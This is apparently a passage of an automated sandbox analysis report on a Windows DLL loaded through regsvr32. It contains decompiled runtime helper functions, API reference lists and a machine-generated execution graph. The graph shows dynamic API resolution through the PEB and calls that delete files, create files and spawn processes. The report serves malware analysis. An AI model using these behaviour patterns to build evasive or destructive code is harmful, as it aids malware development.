                                                                                                                				_push(_t7);
                                                                                                                				_push(_t17);
                                                                                                                				_push(_t14);
                                                                                                                				_t15 = 0x100bde88 + _t11 * 4;
                                                                                                                				if( *_t15 == 0) {
                                                                                                                					EnterCriticalSection(0x100bde70);
                                                                                                                					if( *_t15 == 0) {
                                                                                                                						_t4 = 0x100bdcd8 + _t11 * 0x18;
                                                                                                                						InitializeCriticalSection(_t4);
                                                                                                                						 *_t15 =  *_t15 + 1;
                                                                                                                					}
                                                                                                                					LeaveCriticalSection(0x100bde70);
                                                                                                                				}
                                                                                                                				EnterCriticalSection(0x100bdcd8 + _t11 * 0x18);
                                                                                                                				return _t4;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
                                                                                                                • InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
                                                                                                                • EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2895727460-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002047D(long* __ecx, signed int _a4) {
                                                                                                                				void* _t9;
                                                                                                                				struct _CRITICAL_SECTION* _t12;
                                                                                                                				signed int _t14;
                                                                                                                				long* _t16;
                                                                                                                
                                                                                                                				_t16 = __ecx;
                                                                                                                				_t1 =  &(_t16[7]); // 0x100bdc5c
                                                                                                                				_t12 = _t1;
                                                                                                                				EnterCriticalSection(_t12);
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_t14 <= 0) {
                                                                                                                					L5:
                                                                                                                					LeaveCriticalSection(_t12);
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t3 =  &(_t16[3]); // 0x3
                                                                                                                				if(_t14 >=  *_t3) {
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t9 = TlsGetValue( *_t16);
                                                                                                                				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					LeaveCriticalSection(_t12);
                                                                                                                					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 10020486
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002049B
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204B1
                                                                                                                • LeaveCriticalSection.KERNEL32(100BDC5C,?,?,?,10020AC8,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE), ref: 100204BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969253408-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0.1%
                                                                                                                Total number of Nodes:1055
                                                                                                                Total number of Limit Nodes:17
2a13a2 4246->4247 4248 2a07bb GetPEB 4247->4248 4249 2a13ba 4248->4249 4271 28338b 4249->4271 4251 2a13f0 4251->3929 4253 29736f 4252->4253 4254 28f56b GetPEB 4253->4254 4255 29738c 4254->4255 4255->3929 4257 28fd7b 4256->4257 4264 28f56b 4257->4264 4261 289ebe 4260->4261 4262 29bff0 GetPEB 4261->4262 4263 289f4d DeleteFileW 4262->4263 4263->4237 4265 29bff0 GetPEB 4264->4265 4266 28d507 4265->4266 4266->4234 4268 28b19a 4267->4268 4275 29c0df 4268->4275 4272 28339b 4271->4272 4273 29bff0 GetPEB 4272->4273 4274 283449 SHFileOperationW 4273->4274 4274->4251 4276 29c0fa 4275->4276 4279 29e0ca 4276->4279 4280 29e0e7 4279->4280 4281 29bff0 GetPEB 4280->4281 4282 28b1f9 4281->4282 4282->4242 4284 29bff0 GetPEB 4283->4284 4285 285939 4284->4285 4285->3941 4287 29bff0 GetPEB 4286->4287 4288 28f361 4287->4288 4288->3941 4290 291c12 4289->4290 4291 28f56b GetPEB 4290->4291 4292 291c34 4291->4292 4292->3941 4294 28f1fa 4293->4294 4295 29bff0 GetPEB 4294->4295 4296 28f2a8 SetFileInformationByHandle 4295->4296 4296->3947 4298 29bf49 4297->4298 4299 29bff0 GetPEB 4298->4299 4300 29bfd6 CreateFileW 4299->4300 4300->3947 4302 29190a 4301->4302 4303 29bff0 GetPEB 4302->4303 4304 291999 4303->4304 4304->3947 4306 29e389 4305->4306 4307 29bff0 GetPEB 4306->4307 4308 29e42b CloseHandle 4307->4308 4308->3949 4310 29ba53 4309->4310 4311 29bff0 GetPEB 4310->4311 4312 29bae0 4311->4312 4312->3958 4322 283537 4313->4322 4314 283c34 4316 286a8d GetPEB 4314->4316 4315 29eaa3 RtlAllocateHeap GetPEB 4315->4322 4319 283c45 4316->4319 4317 286a8d GetPEB 4317->4322 4319->3971 4321 29a98e 2 API calls 4321->4322 4322->4314 4322->4315 4322->4317 4322->4319 4322->4321 4323 28c4eb 2 API calls 4322->4323 4325 28f2b9 GetPEB 4322->4325 4330 29b14e 4322->4330 4334 2913d4 4322->4334 4338 29a3e6 4322->4338 4323->4322 4325->4322 4327 28411c 4326->4327 4328 29bff0 GetPEB 4327->4328 4329 28419f 4328->4329 4329->3971 4331 29b16a 4330->4331 4332 29bff0 GetPEB 4331->4332 4333 29b205 4332->4333 4333->4322 4335 
29140f 4334->4335 4336 29bff0 GetPEB 4335->4336 4337 2914bb 4336->4337 4337->4322 4339 29a415 4338->4339 4340 29bff0 GetPEB 4339->4340 4341 29a4a0 4340->4341 4341->4322 4343 284640 4342->4343 4346 291d1c 4343->4346 4347 291d3a 4346->4347 4350 282fe6 4347->4350 4351 283002 4350->4351 4352 29bff0 GetPEB 4351->4352 4353 2830ae 4352->4353 4353->3980 4355 28fff1 4354->4355 4356 29bff0 GetPEB 4355->4356 4357 29008b 4356->4357 4357->4000 4359 295d94 4358->4359 4360 2963d3 4359->4360 4362 284bb4 RtlAllocateHeap GetPEB 4359->4362 4365 2963d1 4359->4365 4366 29734a GetPEB 4359->4366 4367 28fd5f GetPEB 4359->4367 4368 295d68 2 API calls 4359->4368 4369 28b9d7 GetPEB 4359->4369 4370 28fa6c 4359->4370 4374 28fe4b 4359->4374 4378 28428c 4360->4378 4362->4359 4365->4000 4366->4359 4367->4359 4368->4359 4369->4359 4371 28fa85 4370->4371 4372 29bff0 GetPEB 4371->4372 4373 28fb15 4372->4373 4373->4359 4375 28fe5e 4374->4375 4376 29bff0 GetPEB 4375->4376 4377 28fef3 4376->4377 4377->4359 4379 2842a5 4378->4379 4380 29bff0 GetPEB 4379->4380 4381 284337 4380->4381 4381->4365 4383 28c61f 4382->4383 4384 28c635 4382->4384 4383->4384 4385 286a8d GetPEB 4383->4385 4384->4008 4385->4383 4387 295047 4386->4387 4400 290b4c 4387->4400 4394 2a252f 4390->4394 4391 2a2704 4391->4008 4392 284bb4 2 API calls 4392->4394 4393 2a26f3 4395 286a8d GetPEB 4393->4395 4394->4391 4394->4392 4394->4393 4397 29eaa3 2 API calls 4394->4397 4398 28b9d7 GetPEB 4394->4398 4502 29acff 4394->4502 4506 28c453 4394->4506 4395->4391 4397->4394 4398->4394 4405 290b68 4400->4405 4402 290c59 4404 286a8d GetPEB 4402->4404 4406 290c57 4404->4406 4405->4402 4405->4406 4407 29eaa3 2 API calls 4405->4407 4409 287786 4405->4409 4426 28508b 4405->4426 4435 283210 4405->4435 4406->4008 4407->4405 4424 28842c 4409->4424 4410 2888b0 4411 28d5cb GetPEB 4410->4411 4413 2888ae 4411->4413 4412 28f36a GetPEB 4412->4424 4413->4405 4420 284bb4 RtlAllocateHeap GetPEB 4420->4424 4422 291d1c GetPEB 4422->4424 4423 28d68b GetPEB 4423->4424 
4424->4410 4424->4412 4424->4413 4424->4420 4424->4422 4424->4423 4425 28b9d7 GetPEB 4424->4425 4440 289f58 4424->4440 4444 28bd30 4424->4444 4448 28b40a 4424->4448 4452 28fd9d 4424->4452 4456 297473 4424->4456 4482 284d7d 4424->4482 4486 29677f 4424->4486 4425->4424 4434 2855c3 4426->4434 4427 28575d 4429 28d5cb GetPEB 4427->4429 4428 28575b 4428->4405 4429->4428 4430 284bb4 RtlAllocateHeap GetPEB 4430->4434 4431 28d68b GetPEB 4431->4434 4432 28b40a GetPEB 4432->4434 4433 28b9d7 GetPEB 4433->4434 4434->4427 4434->4428 4434->4430 4434->4431 4434->4432 4434->4433 4436 29677f GetPEB 4435->4436 4437 28329c 4436->4437 4438 286a8d GetPEB 4437->4438 4439 2832af 4438->4439 4439->4405 4441 289f7a 4440->4441 4442 29bff0 GetPEB 4441->4442 4443 28a009 4442->4443 4443->4424 4445 28bd52 4444->4445 4446 29bff0 GetPEB 4445->4446 4447 28bdf5 4446->4447 4447->4424 4449 28b43a 4448->4449 4450 29bff0 GetPEB 4449->4450 4451 28b4e0 4450->4451 4451->4424 4453 28fdb3 4452->4453 4454 29bff0 GetPEB 4453->4454 4455 28fe3d 4454->4455 4455->4424 4467 298307 4456->4467 4457 28d5cb GetPEB 4457->4467 4458 298558 4462 284bb4 2 API calls 4458->4462 4459 286a8d GetPEB 4459->4467 4460 29eaa3 2 API calls 4460->4467 4461 2986af 4465 284bb4 RtlAllocateHeap GetPEB 4461->4465 4471 28d68b GetPEB 4461->4471 4475 28b9d7 GetPEB 4461->4475 4466 298578 4462->4466 4464 2987d6 4464->4424 4465->4461 4468 284bb4 2 API calls 4466->4468 4467->4457 4467->4458 4467->4459 4467->4460 4467->4461 4467->4464 4469 284bb4 RtlAllocateHeap GetPEB 4467->4469 4470 28b9d7 GetPEB 4467->4470 4490 288ab6 4467->4490 4494 2865d5 4467->4494 4472 29859a 4468->4472 4469->4467 4470->4467 4471->4461 4473 29ade9 GetPEB 4472->4473 4476 2985c6 4473->4476 4475->4461 4498 29cfc3 4476->4498 4479 28b9d7 GetPEB 4480 298697 4479->4480 4481 28b9d7 GetPEB 4480->4481 4481->4461 4483 284dad 4482->4483 4484 29bff0 GetPEB 4483->4484 4485 284e5c 4484->4485 4485->4424 4487 296792 4486->4487 4488 29bff0 GetPEB 4487->4488 4489 296834 4488->4489 4489->4424 
4491 288af6 4490->4491 4492 29bff0 GetPEB 4491->4492 4493 288baa 4492->4493 4493->4467 4495 286602 4494->4495 4496 29bff0 GetPEB 4495->4496 4497 286697 4496->4497 4497->4467 4499 29cff4 4498->4499 4500 29bff0 GetPEB 4499->4500 4501 298667 4500->4501 4501->4479 4503 29ad1f 4502->4503 4504 29eaa3 2 API calls 4503->4504 4505 29ad9c 4504->4505 4505->4394 4505->4505 4507 28c481 4506->4507 4508 28f56b GetPEB 4507->4508 4509 28c4a8 4508->4509 4509->4394 4511 2a0343 4510->4511 4512 29bff0 GetPEB 4511->4512 4513 2a03e4 4512->4513 4513->4013 4515 29aa83 4514->4515 4516 29bff0 GetPEB 4515->4516 4517 29ab22 4516->4517 4517->4013 4529 293cdd 4518->4529 4522 290c9d 4521->4522 4552 28f43b 4522->4552 4525 290e00 4525->4024 4528 29e373 2 API calls 4528->4525 4532 293d02 4529->4532 4535 28ba93 4532->4535 4536 293f17 4532->4536 4538 285942 4532->4538 4541 291a72 4532->4541 4545 29efa0 4532->4545 4549 28b34c 4532->4549 4535->4024 4537 29e373 2 API calls 4536->4537 4537->4535 4539 28588d GetPEB 4538->4539 4540 28597a 4539->4540 4540->4532 4542 291a88 4541->4542 4543 29bff0 GetPEB 4542->4543 4544 291b14 4543->4544 4544->4532 4546 29efb9 4545->4546 4547 29bff0 GetPEB 4546->4547 4548 29f052 4547->4548 4548->4532 4550 29bff0 GetPEB 4549->4550 4551 28b3f2 4550->4551 4551->4532 4553 29bff0 GetPEB 4552->4553 4554 28f4f2 4553->4554 4554->4525 4555 2914da 4554->4555 4556 2914f9 4555->4556 4557 29bff0 GetPEB 4556->4557 4558 290dee 4557->4558 4558->4528 4560 283f42 4559->4560 4561 29bff0 GetPEB 4560->4561 4562 283ff1 4561->4562 4562->4032 4564 2a1cd8 4563->4564 4565 29bff0 GetPEB 4564->4565 4566 2a1d53 4565->4566 4566->4032 4568 283169 4567->4568 4569 29bff0 GetPEB 4568->4569 4570 283203 4569->4570 4570->4032 4582 28a07f 4571->4582 4572 295b4c GetPEB 4572->4582 4574 28b074 4668 295b4c 4574->4668 4575 284bb4 2 API calls 4575->4582 4578 28b08a 4578->4044 4582->4572 4582->4574 4582->4575 4582->4578 4584 286a8d GetPEB 4582->4584 4585 28b9d7 GetPEB 4582->4585 4586 29e29a GetPEB 4582->4586 4636 2941cf 
4582->4636 4645 285797 4582->4645 4649 285b8a 4582->4649 4652 286505 4582->4652 4656 28400f 4582->4656 4660 29aeae 4582->4660 4664 29b215 4582->4664 4584->4582 4585->4582 4586->4582 4596 2a2a55 4588->4596 4590 2a2bb0 4592 286a8d GetPEB 4590->4592 4591 29eaa3 2 API calls 4591->4596 4593 2a2bae 4592->4593 4593->4044 4594 284bb4 2 API calls 4594->4596 4595 28f56b GetPEB 4595->4596 4596->4590 4596->4591 4596->4593 4596->4594 4596->4595 4597 28b9d7 GetPEB 4596->4597 4680 2951e8 4596->4680 4597->4596 4613 299fc8 4598->4613 4599 29a353 4601 29e18b 2 API calls 4599->4601 4600 286a8d GetPEB 4600->4613 4603 29a379 4601->4603 4602 291d1c GetPEB 4602->4613 4699 28c4b0 4603->4699 4604 29a34e 4604->4044 4606 29eaa3 RtlAllocateHeap GetPEB 4606->4613 4608 284bb4 2 API calls 4608->4613 4611 28b9d7 GetPEB 4611->4604 4612 28f56b GetPEB 4612->4613 4613->4599 4613->4600 4613->4602 4613->4604 4613->4606 4613->4608 4613->4612 4614 28b9d7 GetPEB 4613->4614 4691 29e18b 4613->4691 4695 299556 4613->4695 4614->4613 4622 2991ae 4615->4622 4616 299537 4618 286a8d GetPEB 4616->4618 4620 299535 4618->4620 4620->4044 4621 29eaa3 2 API calls 4621->4622 4622->4616 4622->4620 4622->4621 4623 291d1c GetPEB 4622->4623 4703 2916ad 4622->4703 4709 289617 4622->4709 4623->4622 4635 2947fd 4624->4635 4627 29500a 4629 286a8d GetPEB 4627->4629 4631 29501e 4629->4631 4630 28e379 2 API calls 4630->4635 4631->4044 4632 291d1c GetPEB 4632->4635 4633 286a8d GetPEB 4633->4635 4634 29eaa3 2 API calls 4634->4635 4635->4627 4635->4630 4635->4631 4635->4632 4635->4633 4635->4634 4751 284342 4635->4751 4756 29a4b5 4635->4756 4763 288bcb 4635->4763 4643 294420 4636->4643 4637 294518 4639 294520 4637->4639 4641 286a8d GetPEB 4637->4641 4638 29eaa3 RtlAllocateHeap GetPEB 4638->4643 4639->4582 4641->4639 4642 291d1c GetPEB 4642->4643 4643->4637 4643->4638 4643->4642 4644 286a8d GetPEB 4643->4644 4672 287209 4643->4672 4644->4643 4646 2857d2 4645->4646 4647 29bff0 GetPEB 4646->4647 4648 285872 4647->4648 4648->4582 4676 
2a1933 4649->4676 4653 28652a 4652->4653 4654 29bff0 GetPEB 4653->4654 4655 2865c3 4654->4655 4655->4582 4657 284036 4656->4657 4658 29bff0 GetPEB 4657->4658 4659 2840bd 4658->4659 4659->4582 4661 29aedf 4660->4661 4662 29bff0 GetPEB 4661->4662 4663 29af74 4662->4663 4663->4582 4665 29b237 4664->4665 4666 29bff0 GetPEB 4665->4666 4667 29b2e9 4666->4667 4667->4582 4669 295b62 4668->4669 4670 29bff0 GetPEB 4669->4670 4671 295bfa 4670->4671 4671->4578 4673 28722b 4672->4673 4674 29bff0 GetPEB 4673->4674 4675 2872b9 4674->4675 4675->4643 4677 2a1957 4676->4677 4678 29bff0 GetPEB 4677->4678 4679 285c87 4678->4679 4679->4582 4681 2951fe 4680->4681 4682 29545d 4681->4682 4683 29545b 4681->4683 4686 29eaa3 2 API calls 4681->4686 4687 28c63a 4681->4687 4684 28c63a GetPEB 4682->4684 4683->4596 4684->4683 4686->4681 4688 28c662 4687->4688 4689 29bff0 GetPEB 4688->4689 4690 28c6f0 4689->4690 4690->4681 4692 29e1a5 4691->4692 4693 29eaa3 2 API calls 4692->4693 4694 29e230 4693->4694 4694->4613 4694->4694 4696 29957e 4695->4696 4697 28f56b GetPEB 4696->4697 4698 2995a0 4697->4698 4698->4613 4700 28c4c9 4699->4700 4701 28f56b GetPEB 4700->4701 4702 28c4e3 4701->4702 4702->4611 4705 2916c7 4703->4705 4704 2918a9 4731 29595c 4704->4731 4705->4704 4706 2918a7 4705->4706 4716 28e379 4705->4716 4706->4622 4711 289644 4709->4711 4710 29eaa3 2 API calls 4710->4711 4711->4710 4712 2912ef GetPEB 4711->4712 4713 289996 4711->4713 4714 289985 4711->4714 4712->4711 4713->4622 4715 286a8d GetPEB 4714->4715 4715->4713 4726 28e3b8 4716->4726 4717 28f19d 4718 28d5cb GetPEB 4717->4718 4720 28f19b 4718->4720 4719 284bb4 RtlAllocateHeap GetPEB 4719->4726 4720->4705 4722 29eaa3 2 API calls 4722->4726 4724 2865d5 GetPEB 4724->4726 4725 286a8d GetPEB 4725->4726 4726->4717 4726->4719 4726->4720 4726->4722 4726->4724 4726->4725 4729 28d68b GetPEB 4726->4729 4730 28b9d7 GetPEB 4726->4730 4735 2841c6 4726->4735 4739 28b8f4 4726->4739 4743 28fb23 4726->4743 4747 29ac2c 4726->4747 4729->4726 4730->4726 4732 
295988 4731->4732 4733 29bff0 GetPEB 4732->4733 4734 295a2b 4733->4734 4734->4706 4736 2841eb 4735->4736 4737 29bff0 GetPEB 4736->4737 4738 284279 4737->4738 4738->4726 4740 28b919 4739->4740 4741 29bff0 GetPEB 4740->4741 4742 28b9c4 4741->4742 4742->4726 4744 28fb3c 4743->4744 4745 29bff0 GetPEB 4744->4745 4746 28fbed 4745->4746 4746->4726 4748 29ac56 4747->4748 4749 29bff0 GetPEB 4748->4749 4750 29ace2 4749->4750 4750->4726 4754 284361 4751->4754 4752 284627 GetPEB 4752->4754 4753 2845f4 4753->4635 4754->4752 4754->4753 4755 29eaa3 2 API calls 4754->4755 4755->4754 4758 29a4e1 4756->4758 4757 29e436 GetPEB 4757->4758 4758->4757 4759 29a861 4758->4759 4760 29eaa3 2 API calls 4758->4760 4762 29a872 4758->4762 4761 286a8d GetPEB 4759->4761 4760->4758 4761->4762 4762->4635 4764 288bde 4763->4764 4765 291d1c GetPEB 4764->4765 4766 288c72 4765->4766 4766->4635 4768 2a041a 4767->4768 4770 2a06d7 4768->4770 4771 2a0738 4768->4771 4788 286bfa 4768->4788 4772 29e18b 2 API calls 4770->4772 4771->4051 4773 2a06f1 4772->4773 4779 29112d 4773->4779 4778 28b9d7 GetPEB 4778->4771 4792 284b09 4779->4792 4781 2912e4 4784 29ef56 4781->4784 4785 29ef7b 4784->4785 4786 28f56b GetPEB 4785->4786 4787 29ef98 4786->4787 4787->4778 4789 286c16 4788->4789 4790 29bff0 GetPEB 4789->4790 4791 286cad 4790->4791 4791->4768 4793 284b23 4792->4793 4794 29bff0 GetPEB 4793->4794 4795 284ba7 4794->4795 4795->4781 4796 29683f 4795->4796 4797 296871 4796->4797 4798 29bff0 GetPEB 4797->4798 4799 296911 4798->4799 4799->4781 4801 28bcba 4800->4801 4802 28bd24 4801->4802 4803 284cb9 GetPEB 4801->4803 4804 286a8d GetPEB 4801->4804 4806 29e373 2 API calls 4801->4806 4894 290f7a 4801->4894 4802->4061 4803->4801 4804->4801 4806->4801 4816 2a0d01 4807->4816 4808 2a0d19 4902 2963f0 4808->4902 4809 289574 GetPEB 4809->4816 4811 2a0d42 4811->4061 4812 28ffde GetPEB 4812->4816 4814 284bb4 2 API calls 4814->4816 4815 29734a GetPEB 4815->4816 4816->4808 4816->4809 4816->4811 4816->4812 4816->4814 4816->4815 4817 
28b9d7 GetPEB 4816->4817 4912 28b200 4816->4912 4916 289b80 4816->4916 4817->4816 4931 29e034 4819->4931 4821 2963f0 3 API calls 4838 29fedc 4821->4838 4822 2966c2 2 API calls 4822->4838 4823 286a8d GetPEB 4823->4838 4824 2a02ff 4829 29e373 2 API calls 4824->4829 4825 29ade9 GetPEB 4825->4838 4826 2951e8 2 API calls 4826->4838 4828 2a02fd 4828->4061 4829->4828 4831 289574 GetPEB 4831->4838 4832 291bed GetPEB 4832->4838 4833 28ffde GetPEB 4833->4838 4834 28b9d7 GetPEB 4834->4838 4835 28b200 GetPEB 4835->4838 4836 284bb4 RtlAllocateHeap GetPEB 4836->4838 4837 29734a GetPEB 4837->4838 4838->4821 4838->4822 4838->4823 4838->4824 4838->4825 4838->4826 4838->4828 4838->4831 4838->4832 4838->4833 4838->4834 4838->4835 4838->4836 4838->4837 4839 289b80 3 API calls 4838->4839 4934 28f784 4838->4934 4940 28d7a6 4838->4940 4839->4838 4850 282bc8 4840->4850 4841 2963f0 3 API calls 4841->4850 4844 289574 GetPEB 4844->4850 4845 29e373 GetPEB CloseHandle 4845->4850 4846 2830be GetPEB 4846->4850 4848 28ffde GetPEB 4848->4850 4849 282c16 4851 29e373 2 API calls 4849->4851 4850->4841 4850->4844 4850->4845 4850->4846 4850->4848 4850->4849 4852 28b200 GetPEB 4850->4852 4853 282c31 4850->4853 4854 284bb4 2 API calls 4850->4854 4855 29734a GetPEB 4850->4855 4856 28b9d7 GetPEB 4850->4856 4857 289b80 3 API calls 4850->4857 4944 2a0e6d 4850->4944 4952 28fbf8 4850->4952 4955 28db59 4850->4955 4851->4853 4852->4850 4853->4061 4854->4850 4855->4850 4856->4850 4857->4850 4864 28d206 4858->4864 4859 29aa59 GetPEB 4859->4864 4861 28d23b 4862 290f7a GetPEB 4861->4862 4863 28d24f 4862->4863 4863->4061 4864->4859 4864->4861 4864->4863 4986 283c51 4864->4986 4994 290e0b 4864->4994 4872 2a1738 4866->4872 4867 29aa59 GetPEB 4867->4872 4868 2a1781 4868->4061 4869 2a176d 4871 290f7a GetPEB 4869->4871 4870 283c51 GetPEB 4870->4872 4871->4868 4872->4867 4872->4868 4872->4869 4872->4870 4873 290e0b GetPEB 4872->4873 4873->4872 4889 29710c 4874->4889 4875 289574 GetPEB 4875->4889 4876 297128 4877 2966c2 2 
API calls 4876->4877 4879 29715b 4877->4879 4878 28ffde GetPEB 4878->4889 4880 284bb4 2 API calls 4879->4880 4881 29717e 4880->4881 4883 29734a GetPEB 4881->4883 4882 28b200 GetPEB 4882->4889 4885 2971be 4883->4885 4884 284bb4 2 API calls 4884->4889 4886 28b9d7 GetPEB 4885->4886 4888 2971d6 4886->4888 4887 29734a GetPEB 4887->4889 4890 2963f0 3 API calls 4888->4890 4889->4875 4889->4876 4889->4878 4889->4882 4889->4884 4889->4887 4891 28b9d7 GetPEB 4889->4891 4892 297210 4889->4892 4893 289b80 3 API calls 4889->4893 4890->4892 4891->4889 4892->4061 4893->4889 4895 290f8d 4894->4895 4898 2a1bd6 4895->4898 4899 2a1bf5 4898->4899 4900 29bff0 GetPEB 4899->4900 4901 291069 4900->4901 4901->4801 4903 29641e 4902->4903 4904 28b184 GetPEB 4903->4904 4905 29663b 4904->4905 4923 2946e0 4905->4923 4907 296676 4908 296683 4907->4908 4909 29e373 2 API calls 4907->4909 4908->4811 4910 2966a3 4909->4910 4911 29e373 2 API calls 4910->4911 4911->4908 4913 28b219 4912->4913 4914 28f2b9 GetPEB 4913->4914 4915 28b2e7 4914->4915 4915->4816 4918 289b9f 4916->4918 4919 29bf1c 2 API calls 4918->4919 4920 289e5e 4918->4920 4922 289e5c 4918->4922 4927 29454e 4918->4927 4919->4918 4921 29e373 2 API calls 4920->4921 4921->4922 4922->4816 4924 29471e 4923->4924 4925 29bff0 GetPEB 4924->4925 4926 2947b3 CreateProcessW 4925->4926 4926->4907 4928 294575 4927->4928 4929 29bff0 GetPEB 4928->4929 4930 294615 4929->4930 4930->4918 4932 29bff0 GetPEB 4931->4932 4933 29e0c1 4932->4933 4933->4838 4935 28f7a0 4934->4935 4936 28f983 4935->4936 4937 28f985 4935->4937 4939 29eaa3 2 API calls 4935->4939 4936->4838 4938 284627 GetPEB 4937->4938 4938->4936 4939->4935 4941 28d7d6 4940->4941 4942 29bff0 GetPEB 4941->4942 4943 28d87c 4942->4943 4943->4838 4947 2a0e92 4944->4947 4946 28fbf8 GetPEB 4946->4947 4947->4946 4948 2a1076 4947->4948 4949 2a1061 4947->4949 4966 29d0a1 4947->4966 4970 282f1a 4947->4970 4948->4850 4951 29e373 2 API calls 4949->4951 4951->4948 4953 29bff0 GetPEB 4952->4953 4954 28fcac 
4953->4954 4954->4850 4964 28db99 4955->4964 4957 28b184 GetPEB 4957->4964 4958 28df48 4974 2a1d6d 4958->4974 4960 28e07b 4960->4960 4961 284bb4 2 API calls 4961->4964 4964->4957 4964->4958 4964->4960 4964->4961 4965 28b9d7 GetPEB 4964->4965 4978 295a47 4964->4978 4982 29e8e7 4964->4982 4965->4964 4967 29d0bd 4966->4967 4968 29bff0 GetPEB 4967->4968 4969 29d13e 4968->4969 4969->4947 4971 282f3e 4970->4971 4972 29bff0 GetPEB 4971->4972 4973 282fcc 4972->4973 4973->4947 4975 2a1d80 4974->4975 4976 29bff0 GetPEB 4975->4976 4977 28df59 4976->4977 4977->4850 4979 295a82 4978->4979 4980 29bff0 GetPEB 4979->4980 4981 295b29 4980->4981 4981->4964 4983 29e902 4982->4983 4984 29bff0 GetPEB 4983->4984 4985 29e994 4984->4985 4985->4964 4987 283c6f 4986->4987 4990 283eff 4987->4990 4999 293ff6 4987->4999 4990->4864 4991 291d1c GetPEB 4992 283eb6 4991->4992 4992->4990 4993 291d1c GetPEB 4992->4993 4993->4992 4997 290e27 4994->4997 4995 290f48 4995->4864 4996 29e9a4 GetPEB 4996->4997 4997->4995 4997->4996 5003 283455 4997->5003 5000 294017 4999->5000 5001 29bff0 GetPEB 5000->5001 5002 283e94 5001->5002 5002->4990 5002->4991 5004 283468 5003->5004 5005 29bff0 GetPEB 5004->5005 5006 283502 5005->5006 5006->4997 5008 29da29 5007->5008 5009 29bff0 GetPEB 5008->5009 5010 283149 5009->5010 5010->3884 5012 295cca 5011->5012 5013 29bff0 GetPEB 5012->5013 5014 295d5a 5013->5014 5014->4077 5016 2900ae 5015->5016 5017 29eaa3 2 API calls 5016->5017 5018 29040e 5016->5018 5019 297394 GetPEB 5016->5019 5017->5016 5018->4077 5019->5016 5021 28f61e 5020->5021 5022 29bff0 GetPEB 5021->5022 5023 28f6be 5022->5023 5023->4077 5025 29bff0 GetPEB 5024->5025 5026 28e370 5025->5026 5026->4077 5028 28f9bd 5027->5028 5029 29bff0 GetPEB 5028->5029 5030 28fa61 5029->5030 5030->4081 5032 295c1b 5031->5032 5033 29bff0 GetPEB 5032->5033 5034 295ca5 5033->5034 5034->4086 5036 28e0fe 5035->5036 5037 29bff0 GetPEB 5036->5037 5038 28e19d 5037->5038 5038->4086 5042 28d8af 5039->5042 5041 28da67 5063 28ff02 
